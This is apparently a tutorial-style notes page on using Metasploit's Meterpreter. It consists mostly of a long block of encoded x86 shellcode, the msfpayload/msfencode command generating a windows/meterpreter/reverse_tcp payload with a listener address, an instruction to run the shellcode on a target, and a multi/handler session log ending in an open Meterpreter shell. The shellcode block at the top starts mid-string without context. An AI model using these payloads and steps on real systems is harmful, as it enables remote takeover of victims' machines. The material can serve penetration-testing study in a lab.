"\x31\x41\x49\x41\x4a\x51\x49\x31\x41\x59\x41\x5a\x42\x41" .
"\x42\x41\x42\x41\x42\x41\x42\x33\x30\x41\x50\x42\x39\x34" .
"\x34\x4a\x42\x54\x49\x4b\x31\x49\x4b\x58\x4e\x49\x49\x52" .
"\x51\x5a\x54\x51\x4e\x50\x56\x52\x39\x50\x49\x50\x49\x51" .
"\x39\x50\x49\x51\x39\x51\x39\x50\x49\x51\x39\x50\x49\x50" .
"\x49\x51\x33\x51\x33\x50\x43\x50\x43\x50\x43\x50\x43\x50" .
"\x37\x52\x31\x51\x4a\x51\x5a\x51\x31\x50\x58\x50\x50\x50" .
"\x30\x51\x31\x50\x30\x51\x31\x52\x4b\x51\x31\x51\x31\x50" .
"\x51\x50\x32\x51\x31\x50\x42\x50\x32\x51\x32\x51\x32\x50" .
"\x30\x51\x32\x50\x42\x51\x31\x51\x32\x50\x58\x52\x30\x50" .
"\x38\x51\x31\x50\x42\x54\x35\x50\x4a\x51\x39\x50\x49\x52" .
"\x4c\x50\x4b\x51\x48\x50\x4e\x43\x39\x50\x43\x50\x30\x50" .
"\x45\x52\x30\x51\x37\x54\x30\x51\x33\x50\x50\x50\x4d\x50" .
"\x59\x50\x49\x43\x45\x51\x46\x52\x31\x52\x38\x51\x42\x51" .
"\x33\x50\x54\x50\x4c\x50\x4b\x50\x52\x43\x42\x52\x36\x50" .
"\x50\x50\x4c\x50\x4b\x51\x33\x51\x52\x50\x54\x50\x4c\x50" .
"\x4e\x52\x4b\x50\x52\x52\x52\x51\x46\x43\x44\x50\x4c\x50" .
"\x4b\x51\x44\x50\x32\x50\x45\x43\x48\x50\x56\x52\x4f\x50" .
"\x4d\x43\x37\x50\x52\x52\x4a\x50\x56\x50\x46\x51\x46\x50" .
"\x51\x51\x39\x52\x4f\x50\x50\x50\x31\x51\x39\x52\x30\x50" .
"\x4e\x50\x4c\x51\x37\x50\x4c\x50\x50\x51\x51\x50\x51\x52" .
"\x4c\x51\x37\x52\x52\x50\x56\x50\x4c\x50\x45\x52\x50\x51" .
"\x39\x52\x31\x52\x38\x50\x4f\x50\x56\x52\x4d\x50\x45\x50" .
"\x51\x50\x49\x51\x47\x51\x39\x43\x42\x50\x4c\x50\x30\x51" .
"\x42\x52\x52\x50\x43\x52\x47\x50\x4e\x52\x4b\x50\x51\x51" .
"\x32\x52\x32\x50\x30\x50\x4e\x52\x4b\x50\x43\x43\x42\x50" .
"\x45\x52\x4c\x50\x56\x51\x51\x51\x4a\x52\x50\x50\x4c\x50" .
"\x4b\x50\x51\x52\x30\x52\x32\x51\x48\x50\x4c\x50\x45\x50" .
"\x4b\x52\x50\x50\x52\x52\x34\x52\x30\x50\x4a\x50\x45\x52" .
"\x31\x52\x38\x52\x30\x52\x30\x50\x50\x50\x4c\x50\x4b\x51" .
"\x33\x54\x38\x50\x47\x52\x48\x50\x4c\x50\x4b\x50\x43\x43" .
"\x38\x50\x45\x54\x30\x52\x36\x51\x51\x50\x49\x50\x43\x50" .
"\x4d\x50\x33\x51\x37\x50\x4c\x52\x31\x51\x49\x50\x4e\x52" .
"\x4b\x52\x36\x52\x34\x50\x4e\x52\x4b\x50\x45\x52\x31\x52" .
"\x38\x51\x46\x50\x45\x51\x51\x50\x4b\x50\x4f\x52\x34\x52" .
"\x51\x50\x4f\x50\x30\x50\x4e\x50\x4c\x50\x4f\x50\x31\x50" .
"\x58\x50\x4f\x52\x36\x52\x4d\x51\x33\x50\x31\x50\x4f\x50" .
"\x37\x50\x50\x50\x38\x50\x4d\x50\x30\x50\x43\x51\x35\x51" .
"\x48\x54\x34\x51\x44\x50\x43\x50\x43\x50\x4d\x51\x4a\x50" .
"\x58\x50\x47\x50\x4b\x50\x51\x52\x4d\x52\x31\x50\x34\x50" .
"\x54\x50\x35\x50\x58\x52\x42\x50\x50\x52\x38\x50\x4e\x52" .
"\x4b\x50\x56\x50\x38\x51\x35\x54\x34\x51\x35\x50\x51\x51" .
"\x48\x50\x53\x52\x30\x43\x36\x50\x4c\x50\x4b\x51\x46\x52" .
"\x4c\x52\x32\x52\x4b\x50\x4e\x52\x4b\x50\x50\x52\x38\x51" .
"\x35\x50\x4c\x51\x37\x52\x51\x50\x49\x50\x43\x50\x4c\x50" .
"\x4b\x50\x47\x54\x34\x50\x4e\x52\x4b\x51\x37\x54\x31\x50" .
"\x4e\x50\x30\x50\x4e\x43\x39\x50\x52\x52\x44\x51\x37\x51" .
"\x44\x50\x51\x50\x34\x50\x51\x50\x4b\x52\x31\x50\x4b\x50" .
"\x45\x50\x31\x50\x50\x50\x59\x51\x33\x51\x5a\x52\x32\x52" .
"\x51\x51\x39\x52\x4f\x50\x4b\x50\x50\x52\x30\x51\x48\x51" .
"\x33\x52\x4f\x51\x42\x52\x5a\x50\x4c\x50\x4b\x50\x45\x50" .
"\x42\x50\x5a\x50\x4b\x50\x4d\x52\x36\x50\x51\x50\x4d\x51" .
"\x33\x50\x5a\x50\x47\x52\x51\x50\x4e\x52\x4d\x50\x4f\x52" .
"\x55\x50\x4e\x51\x49\x51\x33\x50\x30\x51\x37\x54\x30\x51" .
"\x33\x50\x30\x52\x30\x50\x50\x50\x51\x43\x48\x50\x50\x50" .
"\x31\x50\x4e\x52\x4b\x50\x50\x52\x4f\x50\x4f\x43\x47\x50" .
"\x4b\x50\x4f\x50\x58\x52\x35\x50\x4d\x52\x4b\x50\x4c\x50" .
"\x30\x50\x4e\x51\x45\x50\x4f\x52\x32\x50\x51\x50\x46\x50" .
"\x43\x51\x48\x50\x4f\x51\x46\x50\x5a\x50\x35\x50\x4d\x52" .
"\x4d\x50\x4d\x50\x4d\x50\x4b\x50\x4f\x50\x4b\x43\x35\x50" .
"\x47\x50\x4c\x51\x37\x54\x36\x50\x43\x50\x4c\x50\x54\x50" .
"\x4a\x50\x4f\x52\x50\x51\x39\x52\x4b\x50\x4b\x52\x30\x51" .
"\x33\x50\x45\x50\x47\x52\x55\x50\x4f\x50\x4b\x50\x43\x54" .
"\x37\x50\x54\x52\x33\x51\x44\x50\x32\x50\x50\x52\x4f\x51" .
"\x42\x50\x4a\x50\x43\x50\x30\x52\x30\x51\x43\x50\x49\x52" .
"\x4f\x50\x58\x51\x45\x51\x35\x50\x33\x52\x31\x54\x31\x50" .
"\x50\x52\x4c\x50\x45\x50\x33\x51\x33\x50\x30\x51\x31\x51" .
"\x31\x41\x41";
Studying how meterpreter is used:
root@bt:/pentest/exploits/framework# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.198.135 R | ./msfencode -b '\x00' -t perl -e x86/alpha_mixed
[*] x86/alpha_mixed succeeded with size 642 (iteration=1)
my $buf =
"\x89\xe6\xdb\xd8\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x49\x6c\x4b\x58\x4e\x69\x45\x50\x43\x30" .
"\x47\x70\x43\x50\x4c\x49\x5a\x45\x50\x31\x4e\x32\x50\x64" .
"\x4e\x6b\x51\x42\x50\x30\x4e\x6b\x50\x52\x56\x6c\x4c\x4b" .
...
The IP and port used are those of the listening machine. Run the shellcode on the target machine; the listening machine then gets a meterpreter session.
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set LHOST 192.168.198.135
LHOST => 192.168.198.135
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.198.135  yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.198.135:4444
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.198.136
[*] Meterpreter session 1 opened (192.168.198.135:4444 -> 192.168.198.136:3961) at 2014-06-02 23:09:44 +0800

meterpreter >